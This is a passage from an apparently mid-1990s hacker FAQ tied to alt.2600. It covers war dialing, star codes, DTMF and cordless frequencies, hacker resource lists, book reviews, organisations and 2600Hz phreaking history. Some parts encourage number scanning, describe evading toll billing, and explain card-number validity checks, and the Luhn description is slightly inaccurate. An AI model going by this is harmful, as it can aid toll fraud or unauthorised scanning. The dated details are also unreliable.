  3281. A war dialer will dial a range of numbers and log what it finds at
  3282. each number.  You can then only dial up the numbers that the war
  3283. dialer marked as carriers or tones.
  3284.  
  3285.  
  3286. 20. Is scanning illegal?
  3287.  
  3288. Excerpt from: 2600, Spring 1990, Page 27:
  3289.  
  3290. -BQ-
  3291. In some places, scanning has been made illegal.  It would be hard,
  3292. though, for someone to file a complaint against you for scanning since
  3293. the whole purpose is to call every number once and only once.  It's
  3294. not likely to be thought of as harassment by anyone who gets a single
  3295. phone call from a scanning computer.  Some central offices have been
  3296. known to react strangely when people start scanning.  Sometimes you're
  3297. unable to get a dialtone for hours after you start scanning.  But
  3298. there is no uniform policy.  The best thing to do is to first find out
  3299. if you've got some crazy law saying you can't do it.  If, as is
  3300. likely, there is no such law, the only way to find out what happens is
  3301. to give it a try.
  3302. -EQ-
  3303.  
  3304. It should be noted that a law making scanning illegal was recently
  3305. passed in Colorado Springs, CO.  It is now illegal to place a call
  3306. in Colorado Springs without the intent to communicate.
  3307.  
  3308.  
  3309. 21. Where can I purchase a lineman's handset?
  3310.  
  3311. Contact East
  3312. 335 Willow Street
  3313. North Andover, MA 01845-5995
  3314. (508)682-2000
  3315.  
  3316. Jensen Tools
  3317. 7815 S. 46th Street
  3318. Phoenix, AZ 85044-5399
  3319.  
  3320. Time Motion Tools
  3321. 12778 Brookprinter Place
  3322. Poway, CA 92064
  3323. (619)679-0303
  3324.  
  3325.  
  3326. 22. What are the DTMF frequencies?
  3327.  
  3328. DTMF stands for Dual Tone Multi Frequency.  These are the tones you
  3329. get when you press a key on your telephone touchpad.  The tone of the
  3330. button is the sum of the column and row tones.  The ABCD keys do not
  3331. exist on standard telephones.
  3332.  
  3333.      1209 1336 1477 1633
  3334.  
  3335.      697   1    2    3    A
  3336.  
  3337.      770   4    5    6    B
  3338.  
  3339.      852   7    8    9    C
  3340.  
  3341.      941   *    0    #    D
  3342.  
  3343.  
  3344. 23. What are all of the * codes?
  3345.  
  3346. Local Area Signalling Services (LASS) and Custom Calling Feature
  3347. Control Codes:
  3348.  
  3349. (These appear to be standard, but may be changed locally)
  3350.  
  3351. *57 Customer Orignated Trace (COT) Activation
  3352. *60 Selective Call Rejection (SCR) Activation
  3353. *61 Selective Distinctive Alerting (SDA) Activation
  3354. *62 Selective Call Acceptance (SCA) Activation
  3355. *63 Selective Call Forwarding (SCF) Activation
  3356. *65 ICLID Activation (caller ID)
  3357. *66 Automatic Recall (AR) Activation
  3358. *67 Call Privacy Toggle
  3359. *68 Computer Access Restriction Toggle
  3360. *68 Computer Access Restriction Toggle
  3361. *69 AC Activation
  3362. *70 Call waiting disable
  3363. *71 Ring, no-answer forward activation
  3364. *72 Call forwarding immediate Activation
  3365. *73 Call forwarding Deactivation
  3366. *74 Speed call 8 program
  3367. *80 SCR Deactivation
  3368. *81 SDA Deactivation
  3369. *82 SCA Deactivation
  3370. *83 SCF Deactivation
  3371. *85 ICLID Deactivation
  3372. *86 AR Deactivation
  3373. *89 AC Deactivation
  3374.  
  3375.  
  3376. 24. What frequencies do cordless phones operate on?
  3377.  
  3378. Here are the frequencies for the first generation 46/49mhz phones.
  3379. The new 900mhz corless phones are not covered.
  3380.  
  3381. Channel    Handset Transmit    Base Transmit
  3382. -------    ----------------    -------------
  3383.    1          49.670mhz          46.610mhz
  3384.    2          49.845             46.630
  3385.    3          49.860             46.670
  3386.    4          49.770             46.710
  3387.    5          49.875             46.730
  3388.    6          49.830             46.770
  3389.    7          49.890             46.830
  3390.    8          49.930             46.870
  3391.    9          49.990             46.930
  3392.   10          49.970             46.970
  3393.  
  3394.  
  3395.  
  3396.  
  3397. Section C: Resources
  3398. ~~~~~~~~~~~~~~~~~~~~
  3399.  
  3400.  
  3401. 01. What are some ftp sites of interest to hackers?
  3402.  
  3403. aql.gatech.edu
  3404. bellcore.com
  3405. bric-a-brac.apple.com
  3406. cert.org
  3407. crimelab.com
  3408. cyberspace.com
  3409. deimos.cs.uah.edu
  3410. f.ms.uky.edu            /pub/misc
  3411. freeside.com
  3412. ftp.armory.com          /pub/user/kmartind/prog
  3413. ftp.clark.net           /pub/jcase
  3414. ftp.csua.berkeley.edu   /pub/cypherpunks
  3415. ftp.eff.org             /pub/cud
  3416. ftp.etext.org
  3417. ftp.mcs.com             /mcsnet.users/crisadm/stuff/research/samples
  3418. ftp.netcom.com          /pub/zzyzx
  3419. ftp.netcom.com          /pub/bradleym
  3420. ftp.rahul.net           /pub/lps
  3421. ftp.std.com             /obi/Mischief/ and /archives/alt.locksmithing
  3422. ftp.warwick.ac.uk
  3423. ftp.win.tue.nl
  3424. ftp.winternet.com       /users/craigb
  3425. garbo.uwasa.fi          /pc/crypt
  3426. ghost.dsi.unimi.it      /pub/crypt
  3427. granuaile.ieunet.ie
  3428. gregorio.stanford.edu
  3429. grind.isca.uiwa.edu
  3430. hack-this.pc.cc.cmu.edu
  3431. halcyon.com
  3432. ideal.ios.net
  3433. lcs.mit.edu             /* Telecom archives */
  3434. martigny.ai.mit.edu
  3435. mary.iia.org            /pub/users/patriot
  3436. nic.funet.fi            /pub/doc/cud
  3437. paradox1.denver.colorado.edu  /anonymous/text-files/pyrotechnics/
  3438. pyrite.rutgers.edu
  3439. rena.dit.co.jp
  3440. ripem.msu.edu           /pub/crypt
  3441. rtfm.mit.edu
  3442. sekurity.com
  3443. spy.org
  3444. theta.iis.u-tokyo.ac.jp /pub1/security
  3445. titania.mathematik.uni-ulm.de
  3446. uceng.uc.edu
  3447. wimsey.bc.ca            /pub/crypto
  3448. world.std.com
  3449.  
  3450.  
  3451. 02. What are some newsgroups of interest to hackers?
  3452.  
  3453. alt.2600                Do it 'til it hertz
  3454. alt.2600.hope.tech      Technology concerns for Hackers on Planet Earth 1994
  3455. alt.cellular
  3456. alt.dcom.telecom
  3457. alt.hackers             Descriptions of projects currently under
  3458.             development (Moderated)
  3459. alt.locksmithing        You locked your keys in *where*?
  3460. alt.hackers.malicious   The really bad guys - don't take candy from them
  3461. alt.privacy.anon-server
  3462. alt.security            Security issues on computer systems
  3463. alt.security.index      Pointers to good stuff in misc.security (Moderated)
  3464. alt.security.keydist    Exchange of keys for public key encryption systems
  3465. alt.security.pgp        The Pretty Good Privacy package
  3466. alt.security.ripem      A secure email system illegal to export from the US
  3467. comp.dcom.cellular
  3468. comp.dcom.telcom.tech
  3469. comp.dcom.telecom       Telecommunications digest (Moderated)
  3470. comp.dcom.telecom.tech
  3471. comp.org.cpsr.announce
  3472. comp.org.cpsr.talk
  3473. comp.org.eff
  3474. comp.org.eff
  3475. comp.risks
  3476. comp.security.announce
  3477. comp.security.misc      Security issues of computers and networks
  3478. comp.security.unix      Discussion of Unix security
  3479. comp.virus              Computer viruses & security (Moderated)
  3480. misc.security           Security in general, not just computers (Moderated)
  3481. rec.pyrotechnics
  3482. sci.crypt               Different methods of data en/decryption
  3483.  
  3484.  
  3485. 03. What are some telnet sites of interest to hackers?
  3486.  
  3487. phred.pc.cc.cmu.edu
  3488.  
  3489.  
  3490. 04. What are some gopher sites of interest to hackers?
  3491.  
  3492. gopher.cpsr.org
  3493. gopher.eff.org
  3494. gopher.phred.org
  3495. gopher.wired.com
  3496. wiretap.spies.com
  3497.  
  3498.  
  3499. 05. What are some World wide Web (WWW) sites of interest to hackers?
  3500.  
  3501. http://crimelab.com//bugtraq/bugtraq/html
  3502. http://cs.purdue.edu/homes/spaf/coast.html
  3503. http://cs.purdue.edu/homes/spaf/pcert.html
  3504. http://dfw.net/~aleph1
  3505. http://first.org
  3506. http://l0pht.com
  3507. http://tamsun.tamu.edu/~clm3840/hacking.html/
  3508. http://tansu.com.au/Info/security.html
  3509. http://the-tech.mit.edu                         (LaMacchia case info)
  3510. http://www.achilles.net/~pluvius
  3511. http://www.tis.com/
  3512. http://www.cpsr.org/home
  3513. http://www.iia.org/~gautier/me.html
  3514. http://www.engin.umich.edu/~jgotts/underground.html
  3515. http://www.net23.com
  3516. http: /www.paranoia.com /defcon
  3517. http://www.phantom.com/~king
  3518. http://www.phred.org
  3519. http://www.spy.org /Security/Local/News
  3520. http://www.wired.com
  3521.  
  3522.  
  3523. 06. What are some IRC channels of interest to hackers?
  3524.  
  3525. #2600
  3526. #hack
  3527. #phreak
  3528. #linux
  3529. #root
  3530. #unix
  3531. #warez
  3532.  
  3533.  
  3534. 07. What are some BBS's of interest to hackers?
  3535.  
  3536. Hacker's Haven          (303)343-4053
  3537. Corrupt Sekurity        (303)753-1719
  3538. Independent Nation      (315)656-4179   NUP: NONUP
  3539. underworld_1994.com     (514)683-1894
  3540. Digital Fallout         (516)378-6640
  3541. fARM R0Ad 666           (713)855-0261
  3542.  
  3543.  
  3544. 08. What books are available on this subject?
  3545.  
  3546.  
  3547. General Computer Security
  3548. ~~~~~~~~~~~~~~~~~~~~~~~~~
  3549. Computer Security Basics
  3550. Author: Deborah Russell and G.T. Gengemi Sr.
  3551. Publisher: O'Reilly & Associates, Inc.
  3552. Copyright Date: 1991
  3553. ISBN: 0-937175-71-4
  3554.  
  3555.     This is an excellent book.  It gives a broad overview of
  3556.     computer security without sacrificing detail.  A must read for
  3557.     the beginning security expert.
  3558.  
  3559. Computer Security Management
  3560. Author: Karen Forcht
  3561. Publisher: Boyd and Fraser
  3562. Copyright Date: 1994
  3563. ISBN: 0-87835-881-1
  3564.  
  3565. Information Systems Security
  3566. Author: Philip Fites and Martin Kratz
  3567. Publisher: Van Nostrad Reinhold
  3568. Copyright Date: 1993
  3569. ISBN: 0-442-00180-0
  3570.  
  3571.  
  3572. Unix System Security
  3573. ~~~~~~~~~~~~~~~~~~~~
  3574. Practical Unix Security
  3575. Author: Simson Garfinkel and Gene Spafford
  3576. Publisher: O'Reilly & Associates, Inc.
  3577. Copyright Date: 1991
  3578. ISBN: 0-937175-72-2
  3579.  
  3580.     Finally someone with a very firm grasp of Unix system security
  3581.     gets down to writing a book on the subject.  Buy this book.
  3582.     Read this book.
  3583.  
  3584. Firewalls and Internet Security
  3585. Author: William Cheswick and Steven Bellovin
  3586. Publisher: Addison Wesley
  3587. Copyright Date: 1994
  3588. ISBN: 0-201-63357-4
  3589.  
  3590. Unix System Security
  3591. Author: Rik Farrow
  3592. Publisher: Addison Wesley
  3593. Copyright Date: 1991
  3594. ISBN: 0-201-57030-0
  3595.  
  3596. Unix Security: A Practical Tutorial
  3597. Author: N. Derek Arnold
  3598. Publisher: McGraw Hill
  3599. Copyright Date: 1993
  3600. ISBN: 0-07-002560-6
  3601.  
  3602. Unix System Security: A Guide for Users and Systems Administrators
  3603. Author: David A. Curry
  3604. Publisher: Addison-Wesley
  3605. Copyright Date: 1992
  3606. ISBN: 0-201-56327-4
  3607.  
  3608. Unix System Security
  3609. Author: Patrick H. Wood and Stephen G. Kochan
  3610. Publisher: Hayden Books
  3611. Copyright Date: 1985
  3612. ISBN: 0-672-48494-3
  3613.  
  3614.  
  3615. Network Security
  3616. ~~~~~~~~~~~~~~~~
  3617. Network Security Secrets
  3618. Author: David J. Stang and Sylvia Moon
  3619. Publisher: IDG Books
  3620. Copyright Date: 1993
  3621. ISBN: 1-56884-021-7
  3622.  
  3623.     Not a total waste of paper, but definitely not worth the
  3624.     $49.95 purchase price.  The book is a rehash of previously
  3625.     published information.  The only secret we learn from reading
  3626.     the book is that Sylvia Moon is a younger woman madly in love
  3627.     with the older David Stang.
  3628.  
  3629. Complete Lan Security and Control
  3630. Author: Peter Davis
  3631. Publisher: Windcrest / McGraw Hill
  3632. Copyright Date: 1994
  3633. ISBN: 0-8306-4548-9 and 0-8306-4549-7
  3634.  
  3635. Network Security
  3636. Author: Steven Shaffer and Alan Simon
  3637. Publisher: AP Professional
  3638. Copyright Date: 1994
  3639. ISBN: 0-12-638010-4
  3640.  
  3641.  
  3642. Cryptography
  3643. ~~~~~~~~~~~~
  3644. Applied Cryptography: Protocols, Algorithms, and Source Code in C
  3645. Author: Bruce Schneier
  3646. Publisher: John Wiley & Sons
  3647. Copyright Date: 1994
  3648. ISBN: 0-471-59756-2
  3649.  
  3650.     Bruce Schneier's book replaces all other texts on
  3651.     cryptography.  If you are interested in cryptography, this is
  3652.     a must read.  This may be the first and last book on
  3653.     cryptography you may ever need to buy.
  3654.  
  3655. Cryptography and Data Security
  3656. Author: Dorothy Denning
  3657. Publisher: Addison-Wesley Publishing Co.
  3658. Copyright Date: 1982
  3659. ISBN: 0-201-10150-5
  3660.  
  3661. Programmed Threats
  3662. ~~~~~~~~~~~~~~~~~~
  3663. The Little Black Book of Computer Viruses
  3664. Author: Mark Ludwig
  3665. Publisher: American Eagle Publications
  3666. Copyright Date: 1990
  3667. ISBN: 0-929408-02-0
  3668.  
  3669.     The original, and still the best, book on computer viruses.
  3670.     No media hype here, just good clean technical information.
  3671.  
  3672. Computer Viruses, Artificial Life and Evolution
  3673. Author: Mark Ludwig
  3674. Publisher: American Eagle Publications
  3675. Copyright Date: 1993
  3676. ISBN: 0-929408-07-1
  3677.  
  3678. Computer Viruses, Worms, Data Diddlers, Killer Programs, and Other
  3679.     Threats to Your System
  3680. Author: John McAfee and Colin Haynes
  3681. Publisher: St. Martin's Press
  3682. Copyright Date: 1989
  3683. ISBN: 0-312-03064-9 and 0-312-02889-X
  3684.  
  3685.  
  3686. Hacking History and Culture
  3687. ~~~~~~~~~~~~~~~~~~~~~~~~~~~
  3688. The Hacker Crackdown: Law and Disorder on the Electronic Frontier
  3689. Author: Bruce Sterling
  3690. Publisher: Bantam Books
  3691. Copyright Date: 1982
  3692. ISBN: 0-553-56370-X
  3693.  
  3694.     Bruce Sterling has recently released the book FREE to the net.
  3695.     The book is much easier to read in print form, and the
  3696.     paperback is only $5.99.  Either way you read it, you will be
  3697.     glad you did.  Mr. Sterling is an excellent science fiction
  3698.     author and has brought his talent with words to bear on the
  3699.     hacking culture.  A very enjoyable reading experience.
  3700.  
  3701. Cyberpunk
  3702. Author: Katie Hafner and John Markoff
  3703. Publisher: Simon and Schuster
  3704. Copyright Date: 1991
  3705. ISBN: 0-671-77879-X
  3706.  
  3707. The Cuckoo's Egg
  3708. Author: Cliff Stoll
  3709. Publisher: Simon and Schuster
  3710. Copyright Date: 1989
  3711. ISBN: 0-671-72688-9
  3712.  
  3713. Hackers: Heroes of the Computer Revolution
  3714. Author: Steven Levy
  3715. Publisher: Doubleday
  3716. Copyright Date: 1984
  3717. ISBN: 0-440-13495-6
  3718.  
  3719.  
  3720. Unclassified
  3721. ~~~~~~~~~~~~
  3722. The Hacker's Handbook
  3723. Author: Hugo Cornwall
  3724. Publisher: E. Arthur Brown Company
  3725. Copyright Date:
  3726. ISBN: 0-912579-06-4
  3727.  
  3728. Secrets of a Super Hacker
  3729. Author: The Knightmare
  3730. Publisher: Loompanics
  3731. Copyright Date: 1994
  3732. ISBN: 1-55950-106-5
  3733.  
  3734.     The Knightmare is no super hacker.  There is little or no real
  3735.     information in this book.  The Knightmare gives useful advice
  3736.     like telling you not to dress up before going trashing.
  3737.     The Knightmare's best hack is fooling Loompanics into
  3738.     publishing this garbage.
  3739.  
  3740. The Day The Phones Stopped
  3741. Author: Leonard Lee
  3742. Publisher: Primus / Donald I Fine, Inc.
  3743. Copyright Date: 1992
  3744. ISBN: 1-55611-286-6
  3745.  
  3746.     Total garbage.  Paranoid delusions of a lunatic.  Less factual
  3747.     data that an average issue of the Enquirer.
  3748.  
  3749. Information Warfare
  3750. Author: Winn Swartau
  3751. Publisher: Thunder Mountain Press
  3752. Copyright Date: 1994
  3753. ISBN: 1-56025-080-1
  3754.  
  3755.  
  3756. 09. What are some mailing lists of interest to hackers?
  3757.  
  3758. Academic Firewalls
  3759. Reflector Address:
  3760. Registration Address: Send a message to majordomo@greatcircle.com
  3761.          containing the line "subscribe firewalls user@host"
  3762.  
  3763. Bugtraq
  3764. Reflector Address:    bugtraq@crimelab.com
  3765. Registration Address: bugtraq-request@crimelab.com
  3766.  
  3767. Cert Tools
  3768. Reflector Address:    cert-tools@cert.org
  3769. Registration Address: cert-tools-request@cert.org
  3770.  
  3771. Computers and Society
  3772. Reflector Address:    Comp-Soc@limbo.intuitive.com
  3773. Registration Address: taylor@limbo.intuitive.com
  3774.  
  3775. Coordinated Feasibility Effort to Unravel State Data
  3776. Reflector Address:    ldc-sw@cpsr.org
  3777. Registration Address:
  3778.  
  3779. CPSR Announcement List
  3780. Reflector Address:    cpsr-announce@cpsr.org
  3781. Registration Address:
  3782.  
  3783. CPSR - Intellectual Property
  3784. Reflector Address:    cpsr-int-prop@cpsr.org
  3785. Registration Address:
  3786.  
  3787. CPSR - Internet Library
  3788. Reflector Address:    cpsr-library@cpsr.org
  3789. Registration Address:
  3790.  
  3791. Macintosh Security
  3792. Reflector Address:    mac-security@eclectic.com
  3793. Registration Address: mac-security-request@eclectic.com
  3794.  
  3795. NeXT Managers
  3796. Reflector Address:
  3797. Registration Address: next-managers-request@stolaf.edu
  3798.  
  3799. rfc931-users
  3800. Reflector Address:    rfc931-users@kramden.acf.nyu.edu
  3801. Registration Address: brnstnd@nyu.edu
  3802.  
  3803. RSA Users
  3804. Reflector Address:    rsaref-users@rsa.com
  3805. Registration Address: rsaref-users-request@rsa.com
  3806.  
  3807.  
  3808. 10. What are some print magazines of interest to hackers?
  3809.  
  3810. 2600 - The Hacker Quarterly
  3811. ~~~~~~~~~~~~~~~~~~~~~~~~~~~
  3812. E-mail address: 2600@well.sf.ca.us
  3813.  
  3814. Subscription Address: 2600 Subscription Dept
  3815.               PO Box 752
  3816.               Middle Island, NY  11953-0752
  3817.  
  3818. Letters and article submission address: 2600 Editorial Dept
  3819.                     PO Box 99
  3820.                     Middle Island, NY  11953-0099
  3821.  
  3822. Subscriptions: United States: $21/yr individual, $50 corporate.
  3823.            Overseas: $30/yr individual, $65 corporate.
  3824.  
  3825.  
  3826. Gray Areas
  3827. ~~~~~~~~~~
  3828. Gray Areas examines gray areas of law and morality and subject matter
  3829. which is illegal, immoral and/oe controversial. Gray Areas explores
  3830. why hackers hack and puts hacking into a sociological framework of
  3831. deviant behavior.
  3832.  
  3833. E-Mail Address: grayarea@well.sf.ca.us
  3834. E-Mail Address: grayarea@netaxs.com
  3835.  
  3836. U.S. Mail Address: Gray Areas
  3837.            PO Box 808
  3838.            Broomall, PA 19008
  3839.  
  3840. Subscriptions: $26.00 4 issues first class
  3841.            $34.00 4 issues foreign (shipped air mail)
  3842.  
  3843.  
  3844. Wired
  3845. ~~~~~
  3846. Subscription Address: subscriptions@wired.com
  3847.           or: Wired
  3848.               PO Box 191826
  3849.               San Francisco, CA 94119-9866
  3850.  
  3851. Letters and article submission address: guidelines@wired.com
  3852.                     or: Wired
  3853.                     544 Second Street
  3854.                     San Francisco, CA 94107-1427
  3855.  
  3856. Subscriptions: $39/yr (US) $64/yr (Canada/Mexico) $79/yr (Overseas)
  3857.  
  3858.  
  3859. Nuts & Volts
  3860. ~~~~~~~~~~~~
  3861. 430 Princeland Court
  3862. Corona, CA 91719
  3863. (800)783-4624
  3864.  
  3865.  
  3866. 11. What are some organizations of interest to hackers?
  3867.  
  3868. Computer Professionals for Social Responsibility (CPSR)
  3869. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
  3870. CPSR empowers computer professionals and computer users to advocate
  3871. for the responsible use of information technology and empowers all who
  3872. use computer technology to participate in the public debate.   As
  3873. technical experts, CPSR members provide the public and policymakers
  3874. with realistic assessments of the power, promise, and limitations of
  3875. computer technology.  As an organization of concerned citizens, CPSR
  3876. directs public attention to critical choices concerning the
  3877. applications of computing and how those choices affect society.
  3878.  
  3879. By matching unimpeachable technical information with policy
  3880. development savvy, CPSR uses minimum dollars to have maximum impact
  3881. and encourages broad public participation in the shaping of technology
  3882. policy.
  3883.  
  3884. Every project we undertake is based on five principles:
  3885.  
  3886. *  We foster and support public discussion of and public
  3887.    responsibility for decisions involving the use of computers in
  3888.    systems critical to society.
  3889.  
  3890. *  We work to dispel popular myths about the infallibility of
  3891.    technological systems.
  3892.  
  3893. *  We challenge the assumption that technology alone can solve
  3894.    political and social problems.
  3895.  
  3896. *  We critically examine social and technical issues within the
  3897.    computer profession, nationally and internationally.
  3898.  
  3899. *  We encourage the use of computer technology to improve the quality
  3900.    of life.
  3901.  
  3902. CPSR Membership Categories
  3903.   75  REGULAR MEMBER
  3904.   50  Basic member
  3905.  200  Supporting member
  3906.  500  Sponsoring member
  3907. 1000  Lifetime member
  3908.   20  Student/low income member
  3909.   50  Foreign subscriber
  3910.   50  Library/institutional subscriber
  3911.  
  3912. CPSR National Office
  3913. P.O. Box 717
  3914. Palo Alto, CA  94301
  3915. 415-322-3778
  3916. 415-322-3798 (FAX)
  3917. E-mail: cpsr@csli.stanford.edu
  3918.  
  3919.  
  3920. Electronic Frontier Foundation (EFF)
  3921. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
  3922. The Electronic Frontier Foundation (EFF) is dedicated to the pursuit
  3923. of policies and activities that will advance freedom and openness in
  3924. computer-based communications. It is a member-supported, nonprofit
  3925. group that grew from the conviction that a new public interest
  3926. organization was needed in the information age; that this organization
  3927. would enhance and protect the democratic potential of new computer
  3928. communications technology. From the beginning, the EFF determined to
  3929. become an organization that would combine technical, legal, and public
  3930. policy expertise, and would apply these skills to the myriad issues
  3931. and concerns that arise whenever a new communications medium is born.
  3932.  
  3933. Memberships are $20.00 per year for students, $40.00 per year for
  3934. regular members, and $100.00 per year for organizations.
  3935.  
  3936. The Electronic Frontier Foundation, Inc.
  3937. 666 Pennsylvania Avenue S.E., Suite 303
  3938. Washington, D.C.  20003
  3939. +1 202 544 9237
  3940. +1 202 547 5481 FAX
  3941. Internet: eff@eff.org
  3942.  
  3943.  
  3944. Free Software Foundation (FSF)
  3945. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
  3946.  
  3947.  
  3948. GNU
  3949. ~~~
  3950.  
  3951.  
  3952. The League for Programming Freedom (LPF)
  3953. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
  3954. The League for Programming Freedom is an organization of people who
  3955. oppose the attempt to monopolize common user interfaces through "look
  3956. and feel" copyright lawsuits.  Some of us are programmers, who worry
  3957. that such monopolies will obstruct our work.  Some of us are users,
  3958. who want new computer systems to be compatible with the interfaces we
  3959. know.  Some are founders of hardware or software companies, such as
  3960. Richard P. Gabriel. Some of us are professors or researchers,
  3961. including John McCarthy, Marvin Minsky, Guy L. Steele, Jr., Robert S.
  3962. Boyer and Patrick Winston.
  3963.  
  3964. "Look and feel" lawsuits aim to create a new class of government-
  3965. enforced monopolies broader in scope than ever before.  Such a system
  3966. of user-interface copyright would impose gratuitous incompatibility,
  3967. reduce competition, and stifle innovation.
  3968.  
  3969. We in the League hope to prevent these problems by preventing
  3970. user-interface copyright.  The League is NOT opposed to copyright law
  3971. as it was understood until 1986 -- copyright on particular programs.
  3972. Our aim is to stop changes in the copyright system which would take
  3973. away programmers' traditional freedom to write new programs compatible
  3974. with existing programs and practices.
  3975.  
  3976. Annual dues for individual members are $42 for employed professionals,
  3977. $10.50 for students, and $21 for others.  We appreciate activists, but
  3978. members who cannot contribute their time are also welcome.
  3979.  
  3980. To contact the League, phone (617) 243-4091, send Internet mail to the
  3981. address league@prep.ai.mit.edu, or write to:
  3982.  
  3983. League for Programming Freedom
  3984. 1 Kendall Square #143
  3985. P.O. Box 9171
  3986. Cambridge, MA 02139 USA
  3987.  
  3988.  
  3989. SotMesc
  3990. ~~~~~~~
  3991. Founded in 1989, SotMesc is dedicated to preserving the integrity and
  3992. cohesion of the computing society.  By promoting computer education,
  3993. liberties and efficiency, we believe we can secure freedoms for all
  3994. computer users while retaining privacy.
  3995.  
  3996. SotMesc maintains the CSP Internet mailing list, the SotMesc
  3997. Scholarship Fund, and the SotMesc Newsletter.
  3998.  
  3999. The SotMESC is financed partly by membership fees, and donations, but
  4000. mostly by selling hacking, cracking, phreaking, electronics, internet,
  4001. and virus information and programs on disk and bound paper media.
  4002.  
  4003. SotMesc memberships are $20 to students and $40 to regular members.
  4004.  
  4005. SotMESC
  4006. P.O. Box 573
  4007. Long Beach, MS  39560
  4008.  
  4009.  
  4010. 12. Where can I purchase a magnetic stripe encoder/decoder?
  4011.  
  4012. CPU Advance
  4013. PO Box 2434
  4014. Harwood Station
  4015. Littleton, MA  01460
  4016. (508)624-4819 (Fax)
  4017.  
  4018.  
  4019.  
  4020.  
  4021. Section D: 2600
  4022. ~~~~~~~~~~~~~~~
  4023.  
  4024. 01. What is alt.2600?
  4025.  
  4026. Alt.2600 is a Usenet newsgroup for discussion of material relating to
  4027. 2600 Magazine, the hacker quarterly.   It is NOT for the Atari 2600
  4028. game machine.  Len@netsys.com created the group on Emmanuel
  4029. Goldstein's recommendation.  Emmanuel is the editor/publisher of 2600
  4030. Magazine. Following the barrage of postings about the Atari machine to
  4031. alt.2600, an alt.atari.2600 was created to divert all of the atari
  4032. traffic from alt.2600.  Atari 2600 people are advised to hie over to
  4033. rec.games.video.classic.
  4034.  
  4035.  
  4036. 02. What does "2600" mean?
  4037.  
  4038.     2600Hz was a tone that was used by early phone phreaks (or
  4039. phreakers) in the 80's, and some currently.  If the tone was sent down the
  4040. line at the proper time, one could get away with all sorts of fun stuff.  
  4041.  
  4042. A note from Emmanuel Goldstein:
  4043.     
  4044. "The Atari 2600 has NOTHING to do with blue boxes or telephones
  4045. or the 2600 hertz tone.  The 2600 hertz tone was simply the first
  4046. step towards exploring the network.  If you were successful at 
  4047. getting a toll call to drop, then billing would stop at that
  4048. point but there would be billing for the number already dialed
  4049. up until the point of seizure.  800 numbers and long distance
  4050. information were both free in the past and records of who called
  4051. what were either non-existent or very obscure with regards to
  4052. these numbers.  This, naturally, made them more popular than
  4053. numbers that showed up on a bill, even if it was only for
  4054. a minute.  Today, many 800 numbers go overseas, which provides
  4055. a quick and free way into another country's phone system
  4056. which may be more open for exploration."
  4057.  
  4058.  
  4059. 03. Are there on-line versions of 2600 available?
  4060.  
  4061.     No.
  4062.  
  4063.  
  4064. 04. I can't find 2600 at any bookstores.  What can I do?
  4065.  
  4066. Subscribe.  Or, let 2600 know via the subscription address that you
  4067. think 2600 should be in the bookstore.  Be sure to include the
  4068. bookstores name and address.
  4069.  
  4070.  
  4071. 05. Why does 2600 cost more to subscribe to than to buy at a newsstand?
  4072.  
  4073. A note from Emmanuel Goldstein:
  4074.  
  4075.   We've been selling 2600 at the same newsstand price ($4) since 1988
  4076.   and we hope to keep it at that price for as long as we can get away
  4077.   with it. At the same time, $21 is about the right price to cover
  4078.   subscriber costs, including postage and record keeping, etc. People
  4079.   who subscribe don't have to worry about finding an issue someplace,
  4080.   they tend to get issues several weeks before the newsstands get
  4081.   them, and they can take out free ads in the 2600 Marketplace.
  4082.  
  4083.   This is not uncommon in the publishing industry.  The NY Times, for
  4084.   example, costs $156.50 at the newsstands, and $234.75 delivered to your
  4085.   door.
  4086.  
  4087.  
  4088.  
  4089.  
  4090. Section E: Miscellaneous
  4091. ~~~~~~~~~~~~~~~~~~~~~~~~
  4092.  
  4093. 01. What does XXX stand for?
  4094.  
  4095. TLA     Three Letter Acronym
  4096.  
  4097. ACL     Access Control List
  4098. PIN     Personal Identification Number
  4099. TCB     Trusted Computing Base
  4100.  
  4101. ALRU    Automatic Line Record Update
  4102. AN      Associated Number
  4103. ARSB    Automated Repair Service Bureau
  4104. ATH     Abbreviated Trouble History
  4105. BOC     Bell Operating Company
  4106. BOR     Basic Output Report
  4107. CA      Cable
  4108. COE     Central Office Equipment
  4109. CMC     Construction Maintenance Center
  4110. CNID    Calling Number IDentification
  4111. CO      Central Office
  4112. COCOT   Customer Owned Coin Operated Telephone
  4113. CRSAB   Centralized Repair Service Answering Bureau
  4114. DDD     Direct Distance Dialing
  4115. ECC     Enter Cable Change
  4116. LD      Long Distance
  4117. LMOS    Loop Maintenance Operations System
  4118. MLT     Mechanized Loop Testing
  4119. NPA     Numbering Plan Area
  4120. POTS    Plain Old Telephone Service
  4121. RBOC    Regional Bell Operating Company
  4122. RSB     Repair Service Bureau
  4123. SS      Special Service
  4124. TAS     Telephone Answering Service
  4125. TH      Trouble History
  4126. TREAT   Trouble Report Evaluation and Analysis Tool
  4127.  
  4128. LOD     Legion of Doom
  4129. HFC     Hell Fire Club
  4130. TNO     The New Order
  4131.  
  4132. ACiD    Ansi Creators in Demand
  4133. CCi     Cybercrime International
  4134. FLT     Fairlight
  4135. iCE     Insane Creators Enterprise
  4136. iNC     International Network of Crackers
  4137. NTA     The Nocturnal Trading Alliance
  4138. PDX     Paradox
  4139. PE      Public Enemy
  4140. PSY     Psychose
  4141. QTX     Quartex
  4142. RZR     Razor (1911)
  4143. S!P     Supr!se Productions
  4144. TDT     The Dream Team
  4145. THG     The Humble Guys
  4146. THP     The Hill People
  4147. TRSI    Tristar Red Sector Inc.
  4148.  
  4149.  
  4150. 02. How do I determine if I have a valid credit card number?
  4151.  
  4152. Credit cards us the Luhn Check Digit Algorithm.  The main purpose of
  4153. this algorithm is to catch data entry errors, but it does double duty
  4154. here as a weak security tool.
  4155.  
  4156. For a card with an even number of digits, double every odd digit and
  4157. subtract 9 if the product is greater than 10.  Add up all the even
  4158. digits as well as the doubled-odd digits, and the result must be a
  4159. multiple of 10 or it's not a valid card.  If the card has an odd
  4160. number of digits, perform the same addition doubling the even digits
  4161. instead.
  4162.  
  4163.  
  4164. 03. Where can I get a copy of the #hack FAQ?
  4165.  
  4166. Find it on FTP at:
  4167. rahul.net /pub/lps
  4168.  
  4169. Find it on World Wide Web at:
  4170. http://dfw.net/~aleph1
  4171. http://www.engin.umich.edu/~jgotts/underground.html
  4172. http://www.phantom.com/~king
  4173.  
  4174. Find it with Finger at:
  4175. will@gnu.ai.mit.edu
